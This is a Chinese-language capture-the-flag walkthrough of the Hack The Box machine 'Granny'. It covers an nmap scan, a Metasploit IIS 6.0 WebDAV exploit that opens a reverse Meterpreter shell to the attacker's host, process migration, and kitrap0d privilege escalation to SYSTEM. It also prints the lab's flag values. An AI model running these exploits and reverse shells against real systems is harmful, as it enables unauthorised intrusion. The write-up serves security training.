Granny - Hackthebox

Hackthebox - Granny

靶场信息

靶场类型

信息搜集

Nmap

┌──(root💀kali)-[~/Desktop/HTB/Easy/Granny]
└─# nmap -sS -A -sC -sV -p- --min-rate 5000 10.10.10.15
Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-28 00:33 EDT
Nmap scan report for 10.10.10.15
Host is up (0.47s latency).
Not shown: 65534 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
| http-methods: 
|_  Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan: 
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
|   Server Type: Microsoft-IIS/6.0
|   WebDAV type: Unknown
|_  Server Date: Mon, 28 Mar 2022 04:34:35 GMT
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2003|2008|XP|2000 (92%)
OS CPE: cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2 cpe:/o:microsoft:windows_server_2008::sp2 cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_2000::sp4
Aggressive OS guesses: Microsoft Windows Server 2003 SP1 or SP2 (92%), Microsoft Windows Server 2008 Enterprise SP2 (92%), Microsoft Windows Server 2003 SP2 (91%), Microsoft Windows 2003 SP2 (91%), Microsoft Windows XP SP3 (90%), Microsoft Windows 2000 SP4 or Windows XP Professional SP1 (90%), Microsoft Windows XP (87%), Microsoft Windows 2000 SP4 (87%), Microsoft Windows Server 2003 SP1 - SP2 (86%), Microsoft Windows XP SP2 or Windows Server 2003 (86%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   598.17 ms 10.10.16.1
2   598.29 ms 10.10.10.15

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 63.49 seconds

Http

这台很眼熟啊，和 Grandpa 似乎架构一样，去尝试一下直接打试试

Metasploit

msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > show options 

Module options (exploit/windows/iis/iis_webdav_scstoragepathfromurl):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   MAXPATHLENGTH  60               yes       End of physical path brute force
   MINPATHLENGTH  3                yes       Start of physical path brute force
   Proxies                         no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS         10.10.10.15      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          80               yes       The target port (TCP)
   SSL            false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI      /                yes       Path of IIS 6 web application
   VHOST                           no        HTTP server virtual host

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.16.4       yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Microsoft Windows Server 2003 R2 SP2 x86

设置好相关的配置，启动

msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > exploit 

[*] Started reverse TCP handler on 10.10.16.4:4444 
[*] Trying path length 3 to 60 ...
[*] Sending stage (175174 bytes) to 10.10.10.15
[*] Meterpreter session 1 opened (10.10.16.4:4444 -> 10.10.10.15:1030) at 2022-03-28 00:39:57 -0400

meterpreter > getuid
[-] stdapi_sys_config_getuid: Operation failed: Access is denied.

似乎连突破点都一样，有点离谱

meterpreter > ps

Process List
============

 PID   PPID  Name               Arch  Session  User                          Path
 ---   ----  ----               ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System
 272   4     smss.exe
 320   272   csrss.exe
 344   272   winlogon.exe
 392   344   services.exe
 404   344   lsass.exe
 560   1064  cidaemon.exe
 584   392   svchost.exe
 672   392   svchost.exe
 732   392   svchost.exe
 772   392   svchost.exe
 788   392   svchost.exe
 888   1064  cidaemon.exe
 924   392   spoolsv.exe
 952   392   msdtc.exe
 960   1064  cidaemon.exe
 1064  392   cisvc.exe
 1112  392   svchost.exe
 1168  392   inetinfo.exe
 1204  392   svchost.exe
 1312  392   VGAuthService.exe
 1380  392   vmtoolsd.exe
 1488  392   svchost.exe
 1588  392   svchost.exe
 1760  392   dllhost.exe
 1856  392   alg.exe
 1876  584   wmiprvse.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\wbem\wmiprvse.exe
 2252  1488  w3wp.exe           x86   0        NT AUTHORITY\NETWORK SERVICE  c:\windows\system32\inetsrv\w3wp.exe
 2392  584   davcdata.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\inetsrv\davcdata.exe
 2552  584   wmiprvse.exe
 3792  2252  rundll32.exe       x86   0                                      C:\WINDOWS\system32\rundll32.exe

meterpreter > migrate 1876
[*] Migrating from 3792 to 1876...
[*] Migration completed successfully.
meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE

跟 Grandpa 一样的漏洞情况，做一个进程迁移就可以了

现在去提权吧

权限提升

msf6 exploit(windows/local/ms10_015_kitrap0d) > show options 

Module options (exploit/windows/local/ms10_015_kitrap0d):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.16.4       yes       The listen address (an interface may be specified)
   LPORT     5555             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows 2K SP4 - Windows 7 (x86)

设置好 session，去执行

msf6 exploit(windows/local/ms10_015_kitrap0d) > exploit 

[*] Started reverse TCP handler on 10.10.16.4:5555 
[*] Launching notepad to host the exploit...
[+] Process 2088 launched.
[*] Reflectively injecting the exploit DLL into 2088...
[*] Injecting exploit into 2088 ...
[*] Exploit injected. Injecting payload into 2088...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (175174 bytes) to 10.10.10.15
[*] Meterpreter session 2 opened (10.10.16.4:5555 -> 10.10.10.15:1031) at 2022-03-28 00:45:56 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

成功提权到 root 权限

meterpreter > search -f user.txt
Found 1 result...
    c:\Documents and Settings\Lakis\Desktop\user.txt (32 bytes)
meterpreter > search -f root.txt
Found 1 result...
    c:\Documents and Settings\Administrator\Desktop\root.txt (32 bytes)
meterpreter > cat 'c:\Documents and Settings\Lakis\Desktop\user.txt'
        700c5dc163014e22b3e408f8703f67d1
meterpreter > cat 'c:\Documents and Settings\Administrator\Desktop\root.txt'
        aa4beed1c0584445ab463a6747bd06e9
meterpreter >

成功拿到 user 和 root 权限的 flag 文件

这台的情况和 Grandpa 一模一样，没什么好说的